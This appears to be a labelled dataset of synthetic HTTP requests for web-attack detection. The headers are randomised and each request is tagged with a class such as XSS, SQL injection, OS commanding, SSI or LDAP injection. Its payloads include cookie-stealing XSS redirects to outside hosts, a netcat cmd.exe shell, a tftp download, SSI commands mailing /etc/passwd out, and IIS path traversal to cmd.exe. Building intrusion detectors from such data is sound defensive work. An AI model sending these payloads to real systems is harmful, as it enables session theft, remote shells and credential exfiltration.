If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 25 Jan 05 12:54:31 UTC
If-Match: "JFFjtQ3dMZUbi3yyi"
If-None-Match: *
If-Range: Sun, 02 Sep 07 11:22:26 GMT
Max-Forwards: 7273
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: Basic aXJuREw6dHdsRHJh
Range: 776-,-33080
Referer: http://hnejetlz.gov/1rtsre/m6elia/a6tiobeb/gssTheg/1beikOpd.nsf
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: fF2BddB56 http://www.lolts.biz
UA-CPU: StrongARM
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 206x873
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40898
Start - Id: 35775
class: XPathInjection
GET /nsjpwT/etsastEl/X_EqFGMVW6-2/om4AdPagtrnt.png?O9zALaq=+auIo&qbinA9binc=Ltnc%27%5D++%7C+++++P+++%7C+++%2F%2Fuser%5B++++name%2Ftext%28++++%29+%3D+%27nhu&PJIhV564jU=jrLhtasi&noeaeseirdt2nd=hxgAXFb&ifee1hj=%5Cn+f%5DCtbvQtbody2tqw&xadminxRx0yXKvsY=ourotcsnoaylmzuXo HTTP/1.0
Host: 102.140.133.126:6
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, x-mac-chinesesimp, us-ascii;q=0.5, ks_c_5601-1987;q=0.1, iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 131.127.116.168
Cookie: ss2=3;dsnitrqtnyrv=gts;2l9aRldnetiguo=dci;teascee=eadRoAraidinput
Cookie2: $Version="11"
Date: Mon, 26 Dec 05 12:45:14 GMT
ETag: W/"jzubY5QOV@qA3b9rK"
Expect: ttoH9Am=sbdt;Ilpzdte=rufew
From: Nginnon@eatp.net
If-Modified-Since: Fri, 03 Feb 06 04:09:46 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Feb 08 14:52:11 UTC
Max-Forwards: 20
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Basic dDhpdzplaWdl
Range: -777
Referer: http://andes.biz/cylaAn/uoReOl/niiactr/sadar/o6xu.png
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 4.0; od-rz; rv:5.1.7) Gecko/97896579
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6100x360
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: jnee
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35775
Start - Id: 47711
class: XSS
GET /oi0V.jpg?vhsteh=sstdinNot4%7CB&kow=%3Cxml+src++++%3D++++%22+++++javascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.asandeor.com%2Fcgi-bin%2Ftone.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&kslr4P=tS%2Fbt%40s%2Fsscriptao3processing-instructionen+54access_log&assc7IaCawl=eLL&ti=2448&tnau=6A8J6Vh&usOsioeMvHe=hFeri7d&ea=3924&Set=8&sRiqz3e@=82174&ebeh=tqot1ttfmaTeeE&nRneseleugie=028556&sayemO=N2hsei%3Ettof0d&bNe36rs=at%40HR HTTP/1.0
Host: 1.84.70.3
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 164.117.5.49
Cookie: arcrheeo=475627;knslh4iaTslntaa=oa7evwSuDrCde6;eno8io=851078;A_XlQ2sbQG=mStw_hFdyQj9
Cookie2: $Version="5"
Date: Thu, 27 Sep 07 24:30:46 CET
ETag: "SJrP0lOLvAUr@LC"
Expect: eAkt=es3Stmno
From: saib3@Tioc.com
If-Modified-Since: Thu, 11 Jan 07 13:05:34 UTC
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "uTeelEarBVxwdPWk"
If-None-Match: *
If-Range: "a4D8OMC2.e9SlXrsbi.-"
Max-Forwards: 85
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehmc twAiie=heeev
Range: 2174-,56-,-57382
Referer: http://www.enhrsi.gov/re3fo/rtee/tAna.jpeg
TE: trailers,deflate
Trailer: Accept
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 7.5; zs-me; rv:7.7.2) Gecko/96430981
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5167x472
Via: FTP/2.4 www.oEmrmN.html, FTP/0.8 13.28.77.253
Transfer-Encoding: o8pah; ieeir=roso9a
Upgrade: Oshni/6.9, edt/9.6, HSilt/8.8, 5jtk/7.8
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47711
Start - Id: 36660
class: OsCommanding
GET /dQ/eheQogae/uL7gMQXJKK.css?ebsaa8r1=Mtsamshstfv%7CR&ohhc=%7C+++shell%28%22cmd+%2Fc+++++c%3AInetpubwwwrootMSISSnc.exe+-l+++++-p++1302+-t++-e+cmd.exe++++%22+%29%7C+++++%27&saccess_logH_aGf=2aOj++n8+ssi%26yi&unmei=raemlo5E7ucsi9ri&wtnstyeeSo3=25 HTTP/1.0
Host: www.gmillr.ch:80
Connection: gettncu
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: aanai5a-e, ao-itp5nspe;q=0.1, ihrl-xf3h, Wnrtwl6-e9ta;q=0.2, q-nweshtrr
Cache-Control: no-cache
Client-ip: 112.112.39.6
Cookie: Oenoea725ri=fnptgst$n;tnemz=7ycekbO;pall=45969
Cookie2: $Version="032"
Date: Sat, 28 Oct 06 09:09:58 CET
ETag: "15WRkN9JUW7JXa-Rohbh"
Expect: 100-continue
From: zeiTo@a5ng.biz
If-Modified-Since: Thu, 13 Jul 06 18:21:01 GMT
If-Unmodified-Since: Tue, 03 May 05 12:38:24 UTC
If-Match: *
If-None-Match: "x_4jj.q1t-TWghFYU"
If-Range: Wed, 15 Jul 09 08:15:09 CET
Max-Forwards: 702
MIME-Version: 0.9
Pragma: tlcr='8dkts1T'
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: Basic OG5vY29QbDpsc09pT3c=
Range: -2,66-,4884-
Referer: /mphmtT/nu5eapkx/d2ge/s9iTo/XVwani.nsf
TE: chunked;q=0.1,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: sl4RC-g http://www.faH0hh.cz
UA-CPU: 68000
UA-OS: Linux
UA-Color: color16
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: dybEwz/6.8, omi/4.8, reoh0o/3.4
Warning: 163 236.57.153.56 "lydo73roHonhdgqkal" "Thu, 26 Jul 07 23:31:59 GMT"
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 2420868137853987546
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36660
Start - Id: 41120
class: SqlInjection
GET /sslibesaqr/ihL-8YNeuIHDJF@SJ/aw1O7D./t-Zbq-aeh-z3Au6O/iqp/rdiondNaeuineaisay/6wenwOgs/w_Ui@Nd7qu8GRiY/nFmNWyLL5Si3..htm?hslotvi=2&Crbtr4I3=41661&cB.nt7xM8Z=D&lajceAi0etn=passwdbJ&mriEanrow=Hce4&ntiiTDdszia=imhktl&efptRehTeOio=x5hlaosojiboaye&nms2uehnoltIea=wds&piyuebkfrs=bulk+++insert+erhzdatsyu+++++from++%27pwdump.exe%27+++with+%28codepage%3D%27RAW%27++++%29 HTTP/1.0
Host: www.e1gp3o.net:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2, iso-8859-6;q=0.5, hz-gb-2312;q=0.5
Accept-Encoding: identity;q=0.8, gzip, compress;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.217.198.81
Cookie: Ionnla=no fE@ul;euparnEemin82s=r rorzuten;de2saoiemn1t=5Mad7thotT
Cookie2: $Version="75"
Date: Tue, 05 May 09 21:31:23 CET
ETag: "PAECi0n2Z39IoFxobYju"
Expect: a3snhd
From: ljbnc@t4tt.net
If-Modified-Since: Mon, 17 Dec 07 13:10:07 GMT
If-Unmodified-Since: Thu, 25 Mar 04 07:15:55 CET
If-Match: "D.xJdd_amdHpyFf0UAa"
If-None-Match: *
If-Range: Sun, 29 Oct 06 17:36:48 UTC
Max-Forwards: 50
MIME-Version: 3.1
Pragma: Esi=nft
Proxy-Authorization: Digest opaque="sqsll"
Authorization: afQeo onatz=xain
Range: -397
Referer: http://www.ytma.net/psit1deI/nHsh/nau7r.doc
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/9.4 (Windows; U; Win98 5.3; YU-ar; rv:6.4.7) Gecko/96758518
UA-CPU: StrongARM
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5422x020
Via: 2.0 www.iitibn.js, HTTP/5.4 www.ioNe.gif, FTP/0.1 104.97.170.90:59
Transfer-Encoding: compress
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 247.25.143.27
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41120
Start - Id: 36717
class: OsCommanding
GET /u._Rsystem0an5/eebmr6meohyPfai/po@@Gd/rdt4osvaeCs5auoled.js?.I9YVQ=821&jhIl2nNrTm=ilt1EhmeabNn&e8n1rrxta0s0sQs=6&Njp1-Knrcp=1534&etei=rrr3tegi4m%3Aa&t74aosrigt=3126801&nsroh=hKi-&2sit5arowgshyq=ts8%3Fservicesqor&wdun=31&armao=e%40wvFahF%40vc&eoso=Si%3D+i%3EsTue%3E1iu&esmstiooi8en=%27++%3B++tftp++++-c+get++++www.aneranngst.com%3A%2Fal.tar&RDsX=85744&gdaubEiD=829213975 HTTP/1.1
Host: www.ieiEsaos.gov
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ee-nhetftb, vxur2lx7-7jO;q=0.2, tes8idtt-t, D-e;q=0.8
Cache-Control: max-stale
Client-ip: 234.49.182.184
Cookie: EsVaApM_=mDJgGwwqojlH;ewIrucrropAp=n9&
Date: Fri, 16 Mar 07 03:10:58 UTC
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: 100-continue
From: reotU@rhzuEsnere.it
If-Modified-Since: Mon, 22 May 06 14:47:30 UTC
If-Unmodified-Since: Thu, 14 Oct 04 24:46:56 UTC
If-Match: "5J49k.JohD@gFQgQ@Zn"
If-None-Match: ".Y9-RharkJiABCYd"
If-Range: Fri, 28 Aug 09 15:43:19 CET
Max-Forwards: 584
MIME-Version: 6.4
Pragma: no-cache
Authorization: fsimhs oedsio=7eRjsxzv
Range: 36-238879
Referer: http://83gi.biz/l0a7/nk4z.png
TE: trailers
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 6.2; t3-ai; rv:1.0.7) Gecko/75018611
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 656x0255
Transfer-Encoding: 45a7
X-Forwarded-For: 18.24.168.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36717
Start - Id: 47793
class: XSS
GET /hQTlPDoR.vDysNcQ/5dZ0_kxS6g04UO/iqNo0hEVqDxZD@UT0/shBF/s4vavltcyxs/jh5ro/sazotvwsyeA/se.sh?iltktJetq=dEKnbetweennstx&atbdsnta7aio=404&1rTgtgwTqtoesEE=A0mail7+8nlTIreesr&zr0SlqnESod=e%3Dbersm&Tw5egsdhetljdt=feger&9d=%3Ca+++href%3D%22++++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ntasonns.com%2Fcgi-bin%2Fsegech.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&Onndenvpteawe=tremoo&svJS4-t=EtoH%3Eo+ttl%29 HTTP/1.1
Host: 29.27.219.200:24097
Connection: keep-alive
Accept: video/*;q=0.6, application/*;q=0.9
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-8-i;q=0.6, cp-936, x-mac-chinesetrad, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: ea-Hsece3Ta, fnec-ia;q=0.6, r3Ae-Dt;q=0.2, xn8-aneatlir, eom-veecstel;q=0.0
Cache-Control: only-if-cached
Client-ip: 14.45.21.194
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="10"
Date: Wed, 10 Sep 08 10:18:02 CET
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Sat, 03 Nov 07 16:38:44 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: Thu, 31 Jan 08 11:00:55 CET
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: 9moa lbh0=lnmeeet
Range: 0291-093,-6139,9552-451245
Referer: /esoemBzs/Teudelsj/hput4t.conf
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: fpnHAGP.t http://www.jaesre3a.biz
UA-CPU: x86
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 876x886
Via: 3.7 57.239.25.118
Transfer-Encoding: compress
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47793
Start - Id: 40049
class: SSI
GET /Rosealppls.dll?Ehwsyq4=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fmail+++++llecmf.com++++%3C+++%2Fetc%2Fpasswd%22--%3E HTTP/1.0
Host: 178.169.255.20:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-1;q=0.5, iso-8859-1, iso-8859-2;q=0.7, x-mac-hebrew
Accept-Encoding: identity, gzip, deflate, identity, identity
Accept-Language: os-6;q=0.0, t1gPei3r-ayiHxm, dr-evJnmtus, eusfsa-r, taEiuah-spnyhe;q=0.9
Cache-Control: max-age=16303
Client-ip: 80.3.170.218
Cookie: aToelwx6eDnio9h=9IK-QeijdRJ_;EllnAeo2b=jMV8q9ygpC;ogn5asEl=uneT2mnodestdin7ttL>;uz-9lLmailicsecho=lttls;QDy.f=wbvhu
Cookie2: $Version="652"
Date: Fri, 18 Jan 08 14:25:25 CET
ETag: W/"_YyATWc.DaW8pqMUzOx"
Expect: 100-continue
From: crdluua@zohe.com
If-Modified-Since: Sat, 10 Jan 09 19:17:17 CET
If-Unmodified-Since: Tue, 14 Oct 08 12:43:58 UTC
If-Match: *
If-None-Match: "X8V@lzT2U6VFNOzvHy"
If-Range: "u5tNej2ZaGie-in"
Max-Forwards: 3161
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: Basic YWlpYU50VDpqbTNlZTdwcQ==
Range: 271-,17364-
Referer: /dneenm6i.tar.gz
TE: deflate,trailers
Trailer: User-Agent
User-Agent: d3beniVN http://www.ita6.com
UA-CPU: MIPS
UA-Disp: 490,576,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4665x776
Via: munr/7.3 161.214.68.211
Transfer-Encoding: compress
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40049
Start - Id: 44076
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.euEIouree.uk:09302
Connection: close
Accept: audio/*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: steTsrrv-aXnabqK
Cache-Control: only-if-cached
Client-ip: 103.148.81.42
Cookie: fZvkdNKW=dropbeet58ogecm0;Ustns85tehNNons=a6O.P_e;lceosrlqtoe5=a3autwwlIa7eb;aoi8n=568;ateeirth=LuDcibferZ0ce
Cookie2: $Version="25"
Date: Fri, 09 Apr 04 19:33:34 UTC
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Tue, 12 Jul 05 23:33:17 CET
If-Unmodified-Since: Wed, 05 Mar 08 03:07:40 UTC
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: *
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: r=hsrr
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Digest realm
Range: 20-
Referer: http://www.aeCyuec.net/igganLe/crhatis/imdsl/w5yzI.zip
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 0.0; ja-jo; rv:2.3.8) Gecko/45992483
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 6.7 www.3x5m.html, peh/8.6 www.ytrtsbGZ.js, HTTP/3.6 30.37.47.72
Transfer-Encoding: deflate
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44076
Start - Id: 40200
class: SSI
GET /tnct/nnpZwrOao/380Yd.ZRdtjst/TrnneonesdpJldo4lln/gr/gyIGJa@rj037/rV/xotJ2EinlhaZemtxlfi/wetog3tgGArp/w9EcgxfquVEJ3/j3elhortt/WO@XOZiQXDT3script.cfm?egrren=%3C%21--+++++%23exec++cmd%3D%22%2Fbin%2Fmail++jbxt.com++++%3C++++%2Fetc%2Fpasswd%22--%3E&eeU2gktW0ae=r+d&0IQK7@sYchild=29825879 HTTP/1.1
Host: www.cylcd.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oh5ai9-hi7d;q=0.1, nprp-oAbs;q=0.8
Cache-Control: only-if-cached
Client-ip: 206.250.78.157
Cookie2: $Version="808"
Date: Fri, 03 Nov 06 15:47:47 UTC
ETag: "h6GFeI6Xpx0R31tNI"
If-Modified-Since: Mon, 23 May 05 09:52:35 GMT
If-Match: *
If-None-Match: *
Authorization: NTLM b3FkOGVDY2xjaDllOHR1cnJOaXV0Z2xubnVyajI4ZTVhem0=
Referer: /iEtta.pdf
User-Agent: Mozilla/4.0 (X11; U; Unix 2.0; f6-ma; rv:8.3.1) Gecko/29942989
UA-Disp: 9617,113,16
Via: 0.5 111.37.36.166, 0.8 181.21.105.196
Transfer-Encoding: deflate

null

End - Id: 40200
Start - Id: 38540
class: LdapInjection
GET /oXHgxZXkt0QCZWxEXI.Q.jpg?6oc=lryinserti%7CvaorQc&9htacceslogH=setcnyetai%2Frhtoa%29iroptt8&etcCdVMlo5ce=ecpenpy8&daa=478&n4loeOm8tUdnt=o&0Uwdiv9=%7E%5D&drxynre=3643%29%28%26%28objectClass%3Drcin%29%28%7C%28sn+%3D++++als%29%28cn%3Dwfn+++++J*%29%29&brti=ht&edis4etsccdva0=awo3u HTTP/1.0
Host: 174.74.224.53
Connection: keep-alive
Accept: application/*;q=0.0
Accept-Charset: x-mac-cyrillic, iso-8859-7;q=0.4, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: ieoade='imlchsos'
Client-ip: 207.161.30.104
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="7"
Date: Sun, 27 May 07 17:57:19 UTC
ETag: W/"LzfgK5k748beRBr_"
Expect: yyiraR
From: eTmmd@usijk.cz
If-Modified-Since: Thu, 16 Apr 09 19:56:01 GMT
If-Unmodified-Since: Sun, 15 Jun 08 18:51:33 CET
If-Match: *
If-None-Match: *
If-Range: "o9YUo_GavxBf@_GIMQ"
Max-Forwards: 06
MIME-Version: 8.2
Pragma: ov07eii='aehosrn'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: c0hR cjoints=SGlhrsu
Range: 447-,158917-
Referer: http://yiad4g.cz/imy4/1Eht/et4ala/aslcoo/sdacrl1u.txt
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 0.6; ci-4N; rv:2.4.9) Gecko/89872694
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8726x4401
Via: 1.8 100.234.172.22, 0.1 130.177.53.180
Transfer-Encoding: deflate
Upgrade: nuhgRe/9.5
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38540
Start - Id: 39489
class: SSI
POST /nomhwmiynebiEr/sslgItnh9eol/e9va2O6kAhGtq2MgLlrW/form0BLw_Nvq%uWmcexec/opaso/eNZVmR6KDDDzyb/Io9/5iC/@FZsJN1_PdEa/z1drbfeeeerttt/Aalfmnewho.css? HTTP/1.0
Content-Length: 92
Content-Language: srHebs,v1tnt1Dy,ed
Content-Encoding: gzip
Content-Location: http://0meiaxkt.com/eazE/mledcfot/znogM/hIie/iLia.jsp
Content-MD5: ZnpjbWE2Z2FlaHdxbmVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Nov 09 10:51:16 UTC
Host: www.gepaoA3hi.de
Connection: keep-alive
Accept: image/*, image/png;q=0.3
Accept-Charset: x-mac-ce;q=0.7
Accept-Encoding: deflate;q=0.1, compress;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: no-transform
Cookie: tbtUefpr8=' ;l6seuoo=<!--#echo var="date_gmt"-->;apwhbmlitlic=e5~etca;elfe=rag4Edhes+;YddformWt4OOU=1;ialmsrhmmeO1sor=sXe
Cookie2: $Version="03"
Date: Sat, 02 Sep 06 13:16:52 UTC
ETag: "ePYlvgzlhKGP2z7fo1"
Expect: 100-continue
If-Modified-Since: Mon, 19 Nov 07 17:23:29 CET
If-Unmodified-Since: Tue, 19 Aug 08 12:17:49 CET
If-Match: "qKKIwOXGlBBXEpeq-2T6"
If-None-Match: "z9E05bcPdz.bjLn2Z"
If-Range: Wed, 11 Apr 07 23:05:30 CET
Max-Forwards: 615
Pragma: no-cache
Authorization: Digest algorithm=MD5
Referer: /ogzh/ta8tArr/gin2rm1g/pi8sel/1ccee.dll
TE: gzip;q=0.2,deflate;q=0.8
Trailer: If-Match
User-Agent: riDdo7y
UA-Disp: 615,593,32
Via: FTP/9.5 101.215.212.33:270, HTTP/3.8 116.101.65.236:87, slt/3.8 www.9iaT.png
Warning: 126 113.149.42.200 "pgO8Tuktzogeutgaoe" 
X-Forwarded-For: 161.240.201.105
----: --------------------------------

Bgv1tg3ia=tmfqSnTeatd&aameniuilmt5M=9s@s&i9aih6u=80399626&imfntheiko=t&rc5i5aommesfrnO=5A4

End - Id: 39489
Start - Id: 44323
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.hwdweaZnl.st:244
Connection: bcp2e
Accept: audio/x-wav, audio/basic;q=0.5
Accept-Charset: windows-1253;q=0.5, x-mac-cyrillic;q=0.4, iso-8859-3;q=0.9, iso-8859-9;q=0.1, x-mac-ce;q=0.5
Accept-Encoding: compress, deflate, identity;q=0.9, compress
Accept-Language: iIi-elAiel;q=0.7
Cache-Control: max-age=1078
Client-ip: 224.122.29.23
Cookie: tcss=00;W4Zdxz-=d&)gpasswdemr y]idoeG
Cookie2: $Version="7"
Date: Fri, 28 Aug 09 03:49:08 UTC
ETag: "8n0SdKaafzTrTySu-@"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: Wed, 15 Aug 07 13:16:52 UTC
Max-Forwards: 95
MIME-Version: 1.6
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: NTLM cGxwYWFlb3FtU055a2VhaEUzdGVkbjJ0bjlhYnR3aWVvemFteU4=
Range: 88-15414
Referer: http://www.inwrstcl.net/uUhagjnf.jpg
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: i9iteouar/9.3.6
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44323
Start - Id: 39688
class: SSI
GET /cllrqa2ihsehioDdbe/nzFuQQhH/oYQ49/rwCexp12pKrcpC6/9mNhKUa-v.msf?mosoevntwupnhpt=lvr.Ydv3&tesmE=ua3h3&RoI1o41rzvO=cvctfrei&vngntiNnn=%3C%21--++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&Hbewaa=1871329&86idslPd7snt=1eprwKiframe1lv&qkeeonw=3&caefszcdlew6tz=59786600&eo8tdeetbmptes=o3u+lnbu&wM=hiutste HTTP/1.1
Host: 31.89.78.93
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-2022-jp;q=0.4, windows-1252, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: re-tTfni;q=0.5, i5-nhe6lae;q=0.1, de2-lq6us7a;q=0.5
Cache-Control: no-store
Client-ip: 170.88.156.59
Cookie: yrnoeepZfnuh1u=gBGSVW.ci;lmtmHaashNj=nEo%;9Owf5wT_cJ=rtoet'eOfwZeefUl;Nalavaeadsegtie=35019323;rmtciih=f6Svr;gpenfnytf=\7t6f
Cookie2: $Version="672"
Date: Mon, 31 May 04 18:47:55 CET
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Fri, 10 Jun 05 18:00:36 GMT
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: "S6b9OQxbHrRTnn4dERhx"
If-Range: Sun, 02 May 10 06:14:22 CET
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM eWFzbG90QXl0YXM0YXR1ejdzMGZzdGFkaGNpZWtJYWZyQm5OdXM3bEJ1eXVp
Range: 11490-87515,-392,063833-721563
Referer: http://www.5anSmeoh.de/kim1/mI0motl/hvNj0/olL2oAo.wmn
TE: chunked;q=0.7
Trailer: User-Agent
User-Agent: eoysooehre (9.-aJnK; w_1p_g2.j@)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.3 www.yrla.htm
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------------------------
